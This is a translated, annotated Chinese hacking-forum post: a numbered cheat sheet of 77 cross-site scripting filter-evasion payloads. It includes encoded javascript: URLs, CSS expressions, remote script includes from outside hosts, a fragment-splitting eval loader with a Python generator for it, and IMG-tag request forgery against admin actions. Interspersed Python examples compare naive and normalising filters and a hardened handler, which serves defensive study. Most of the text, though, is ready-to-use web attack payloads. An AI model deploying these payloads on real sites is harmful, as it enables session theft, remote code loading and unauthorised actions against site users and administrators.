中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: xss详细利用大全1 (XSS exploitation compendium, part 1)
Author: admin
Posted: 2012-9-13 17:04
Cross-site image shell

XSS test code: <script>alert("")</script>

Put this code on the first line of the webshell and save the shell as a .jpg. The post says that "accessing the image-format shell" runs it; that is only true when the .jpg is loaded as a script, for example through <SCRIPT SRC=".../shell.jpg"> as in (58) below, or is served with an HTML or JavaScript Content-Type. A browser that merely renders the file as an image executes nothing in it.
(1) Ordinary XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive (the post repeats the payload of (1) here; the quoted form with a semicolon, which (3) then strips, is the one meant)

<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required). The forum has decoded the entities, so the payload shows in plain form; the original writes every character of the javascript: URL as a decimal entity, for example &#106; for "j"

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (needs no quotes at all; use a char-code calculator to build the string)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 decimal entity encoding (char-code calculator); the entity string is elided in the post

<IMG SRC=jav..omitted..S')>

(9) 7-digit zero-padded decimal entities without semicolons (char-code calculator), which defeat filters that look for "&#NN;"; elided in the post

<IMG SRC=jav..omitted..S')>

(10) Hex entities, also without semicolons (char-code calculator); elided in the post

<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the word "javascript" (a raw tab character, which the forum renders as a space)

<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab splitting "javascript" (the forum decoded the entity; it is &#x09;)

<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline (&#x0A;)

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return (&#x0D;)

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, the extreme version: the original breaks the tag after every single character with carriage returns; the forum has rejoined it onto one line

<IMG SRC="javascript:alert('XSS')">
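Added example (not part of the original post): a small Python script that generates the encodings behind entries (5) and (8)-(15) from the plain javascript: URL and runs them against two filters, a substring match on the raw attribute value and one that first decodes entities (with or without semicolons) and strips the control characters browsers ignore inside a URL scheme. The payload string and both filter functions are constructed for this example.

```python
import html
import re

# Constructed sample: the javascript: URL used throughout this list.
PAYLOAD = "javascript:alert('XSS')"


def decimal_entities(s, semicolon=True):
    """Entries (5)/(8): every character as a decimal entity, e.g. 'j' -> '&#106;'."""
    return "".join(f"&#{ord(c)}" + (";" if semicolon else "") for c in s)


def padded_decimal_entities(s, width=7):
    """Entry (9): 7-digit zero-padded decimal entities with no semicolons,
    e.g. 'j' -> '&#0000106'. Defeats filters that only recognise '&#NN;'."""
    return "".join(f"&#{ord(c):0{width}d}" for c in s)


def hex_entities(s):
    """Entry (10): hex entities with no semicolons, e.g. 'j' -> '&#x6A'."""
    return "".join(f"&#x{ord(c):X}" for c in s)


def split_scheme(s, filler):
    """Entries (11)-(14): break the word 'javascript' with a tab, newline or CR,
    raw or as an entity such as '&#x09;'. Browsers drop these inside a scheme."""
    return s[:3] + filler + s[3:]


def naive_blocklist(attr_value):
    """The kind of check these vectors defeat: substring match on the raw value."""
    return "javascript:" in attr_value.lower()


def normalized_blocklist(attr_value):
    """Decode entities first (html.unescape accepts numeric references with or
    without a semicolon), then remove code points 0-32, which browsers ignore
    inside a URL scheme, then match. This is the step the filters in (5)-(15) lack."""
    decoded = html.unescape(attr_value)
    stripped = re.sub(r"[\x00-\x20]", "", decoded)
    return "javascript:" in stripped.lower()


def demo():
    """Return {variant: (naive_blocked, normalized_blocked)} for each encoding."""
    variants = {
        "plain": PAYLOAD,
        "decimal": decimal_entities(PAYLOAD),
        "padded_decimal": padded_decimal_entities(PAYLOAD),
        "hex": hex_entities(PAYLOAD),
        "raw_tab": split_scheme(PAYLOAD, "\t"),
        "entity_newline": split_scheme(PAYLOAD, "&#x0A;"),
    }
    return {k: (naive_blocklist(v), normalized_blocklist(v)) for k, v in variants.items()}


if __name__ == "__main__":
    for name, (naive, normalized) in demo().items():
        print(f"{name:16} naive={naive!s:5} normalized={normalized}")
```

Every encoded variant slips past the substring check and is caught once the value is decoded and stripped; the same normalisation also covers the leading-character tricks in (19) and (47), since those characters fall in the 0-32 range or decode to it.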
(16) Getting around a per-field character limit (all fragments must be on the same page, in order). The forum software rewrote eval( as eval_r(; the last fragment must call eval:

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

Note that "</script>" is deliberately split across the last two fragments ("js></sc" + "ript>"); a fragment whose string literal contained it whole would close its own <script> element early.
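Added example (not from the post): a Python generator for the fragment technique in (16). Given a payload and a per-field length limit it emits the <script>z=z+'...'</script> pieces, escaping quotes and backslashes and never letting a fragment's string literal contain "</script", plus a reassemble() helper that replays the browser's concatenation so the split can be checked for losslessness. The sample payload and the limit of 40 characters are constructed.

```python
import re

HEAD_FIRST = "<script>z='"
HEAD_REST = "<script>z=z+'"
TAIL = "'</script>"
FINAL = "<script>eval(z)</script>"


def js_escape(ch):
    """Escape one character for use inside a single-quoted JS string literal."""
    return ch.replace("\\", "\\\\").replace("'", "\\'")


def chunk_script(payload, max_len):
    """Split `payload` into <script>z=z+'...'</script> fragments of at most
    max_len characters each. Two rules keep every fragment valid:
      * an escape sequence is never split across fragments;
      * no fragment's literal may contain '</script', which would end the
        script element early (the post splits 'js></sc' + 'ript>' by hand).
    """
    budget = max_len - len(HEAD_REST) - len(TAIL)
    if budget < 2 or max_len < len(FINAL):
        raise ValueError("max_len too small for a fragment")
    pieces, buf = [], ""

    def flush():
        nonlocal buf
        head = HEAD_FIRST if not pieces else HEAD_REST
        pieces.append(head + buf + TAIL)
        buf = ""

    for ch in payload:
        esc = js_escape(ch)
        if len(buf) + len(esc) > budget or (buf + esc).lower().endswith("</script"):
            flush()
        buf += esc
    if buf:
        flush()
    pieces.append(FINAL)
    return pieces


def reassemble(pieces):
    """What the browser ends up with: extract each string literal, unescape it
    and concatenate. Used to verify that chunk_script() is lossless."""
    out = ""
    for p in pieces[:-1]:
        m = re.fullmatch(r"<script>z=(?:z\+)?'(.*)'</script>", p, re.S)
        out += re.sub(r"\\(.)", r"\1", m.group(1), flags=re.S)
    return out


if __name__ == "__main__":
    # Constructed target: the same document.write() the post builds by hand.
    target = 'document.write("<script src=http://www.shell.net/1.js></script>")'
    for fragment in chunk_script(target, 40):
        print(fragment)
```

The budget is computed from the longer z=z+' header so that every fragment, including the first, fits the limit; the final eval fragment is emitted unchanged, so the limit must be at least its 24 characters.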
(17) Null byte inside the scheme

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2 (author's note: null bytes are basically useless domestically, because there is nowhere to exploit them)

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag (the original puts a &#14; entity among the spaces; the forum dropped it)

<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative URL)

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes: breaking out of a quoted JavaScript string the server wrote around the input

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image (the forum dropped the TYPE attribute; it is TYPE="IMAGE")

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag with an event handler (the post shows only <BODY('XSS')>; the forum stripped the ONLOAD=alert part)

<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) Stylesheet LINK with a javascript: URL

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript (the "</STYLE><UL><LI>XSS" tail in the post was copied over from (39))

<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with a javascript: URL after a decoy URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE background

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted after the open parenthesis (the post lists the accepted decimal character codes as 1-32&34&39&160&8192-8&13&12288&65279; the forum rendered the inserted character as a space)

<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression (IE only; the forum rewrote expression( as expression_r()

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute carrying an expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (IE treats anything that starts with an open angle bracket and a letter as a tag)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with the word "expression" broken up; only this tail of the payload survives in the post

exppression(alert("XSS"))'>

(53) STYLE background (the stray leading <STYLE> in the post is a copy artifact)

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash file can smuggle in the XSS (the forum rewrote eval( as eval_r()

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must sit on the same server as the XSS vector

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JavaScript is filtered, put it inside an image file and load that file with SCRIPT SRC (the SRC is empty in the post; it should point at the image that carries the script). This relied on browsers of the time ignoring the Content-Type of a script source; current browsers refuse to run a script response served as image/*, and X-Content-Type-Options: nosniff blocks any non-JavaScript type.

<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands. The post says this "can execute arbitrary commands"; it cannot. What the tag does is make every visitor's browser send an authenticated GET to the URL (a cross-site request forgery), so if the visitor is logged in to www.XXX.com as an administrator and that application performs state changes on GET requests, the action runs with the visitor's privileges: delete a user, add a user, and so on.

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands 2 (a.jpg on the same server as this .htaccess rule, i.e. the attacker's): an Apache redirect so that an innocent-looking image URL bounces the visitor's browser to the admin action

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
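Added example (not from the post): the server side of (59) and (60) in Python, as the vulnerable handler next to a hardened one. The request dictionaries, the session and its CSRF token are constructed for this example; the first request is what a browser sends when it loads <IMG SRC="http://www.XXX.com/admin.asp&deleteuser"> from another site, with the session cookie attached (which needs SameSite=None or a browser without SameSite defaults).

```python
# Constructed request: the browser fetching the <IMG> from a page on another site.
IMG_FETCH = {
    "method": "GET",
    "path": "/admin.asp",
    "query": "deleteuser",
    "headers": {"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Dest": "image"},
    "form": {},
}

# Constructed request: the real admin form submitted on www.XXX.com itself.
ADMIN_FORM_POST = {
    "method": "POST",
    "path": "/admin.asp",
    "query": "deleteuser",
    "headers": {"Sec-Fetch-Site": "same-origin", "Sec-Fetch-Dest": "document"},
    "form": {"csrf_token": "t0k3n-bound-to-session"},
}

# Hypothetical session looked up from the cookie the browser attaches to both requests.
SESSION = {"user": "root", "role": "admin", "csrf_token": "t0k3n-bound-to-session"}


def vulnerable_admin(request, session):
    """State change on an authenticated GET: exactly what (59)/(60) abuse."""
    if session.get("role") != "admin":
        return "forbidden"
    if request["path"] == "/admin.asp" and request["query"] == "deleteuser":
        return "deleted"
    return "ignored"


def hardened_admin(request, session):
    """Same action, but only for a same-origin POST carrying the session-bound
    CSRF token. An <img> load can satisfy none of the three conditions."""
    if session.get("role") != "admin":
        return "forbidden"
    if request["method"] != "POST":
        return "rejected: state change on GET"
    # Sec-Fetch-Site is "none" for a user-typed navigation; older browsers omit
    # the header entirely, so this is defence in depth and the token is the real check.
    if request["headers"].get("Sec-Fetch-Site") not in ("same-origin", "none"):
        return "rejected: cross-site request"
    if request["form"].get("csrf_token") != session.get("csrf_token"):
        return "rejected: missing or wrong CSRF token"
    if request["path"] == "/admin.asp" and request["query"] == "deleteuser":
        return "deleted"
    return "ignored"


if __name__ == "__main__":
    print("vulnerable, img fetch :", vulnerable_admin(IMG_FETCH, SESSION))
    print("hardened,   img fetch :", hardened_admin(IMG_FETCH, SESSION))
    print("hardened,   admin form:", hardened_admin(ADMIN_FORM_POST, SESSION))
```

The 302 trick in (60) changes nothing here: the browser follows the redirect with the same GET, so the hardened handler rejects it at the first check.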
(61) Bypassing symbol filtering: sites that allow <SCRIPT> but block <SCRIPT SRC with a regex such as /<script[^>]+src/i. A quoted attribute value containing ">" stops the regex before it reaches SRC, while the browser keeps parsing the tag

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65) (backticks as attribute quotes; IE only)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)

<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67) The tag is assembled at run time, so no static pattern sees it

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
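Added example (not from the post): the regex filter that (61)-(67) target next to a tokenizer-based check, in Python. The regex is the one these vectors were written against; the parser check uses html.parser, which handles quoted attribute values containing ">" the way a browser does. The sample fragments are copied from (61), (63), (66) and (67); the two filter functions are constructed for this example.

```python
import re
from html.parser import HTMLParser

# The filter these vectors target: allow <SCRIPT>, reject <SCRIPT ... SRC
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src", re.I)


def regex_blocks(fragment):
    """True if the naive regex filter would reject the fragment."""
    return bool(SCRIPT_SRC_RE.search(fragment))


class ScriptSrcFinder(HTMLParser):
    """Tokenise the fragment like a browser (a quoted attribute value may
    contain '>') and record every <script> start tag that carries src."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value is not None:
                    self.sources.append(value)


def parser_blocks(fragment):
    """True if a tokenizer-based filter sees an external script."""
    finder = ScriptSrcFinder()
    finder.feed(fragment)
    finder.close()
    return bool(finder.sources)


# Constructed samples, copied from the entries above.
SAMPLES = {
    "plain": '<SCRIPT SRC="http://3w.org/xss.js"></SCRIPT>',
    "61": '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',
    "63": '<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>',
    "66": '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',
    "67": '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>',
}


def compare():
    """Return {sample: (regex_blocked, parser_blocked)}."""
    return {k: (regex_blocks(v), parser_blocks(v)) for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for name, (rx, ps) in compare().items():
        print(f"{name:6} regex={rx!s:5} parser={ps}")
```

The parser catches the quoting tricks the regex misses, but (67) gets past both, because the src attribute only exists after document.write() runs. That is the general lesson of this section: a blocklist over the raw markup is a losing game, and the reliable fix is context-aware output encoding plus a Content-Security-Policy that does not allow the attacker's host.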
(68) URL evasion: IP address instead of hostname (assuming the hostname itself is blocked)

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the forum decoded it; the original writes the hostname as %XX sequences)

<A HREF="http://3w.org">XSS</A>

(70) Dword IP (3232235521 is 192.168.0.1 as a single 32-bit integer)

<A HREF="http://3232235521">XSS</A>

(71) Hex IP

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: tabs and newlines inside the URL (browsers strip them) plus decimal, octal and hex octets; 66.000146.0x7.147 is 66.102.7.147. The forum rendered the tabs as spaces

<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

(74) Dropping "http:" (protocol-relative URL)

<A HREF="//www.google.com/">XSS</A>

(75) Dropping "www"

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot

<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2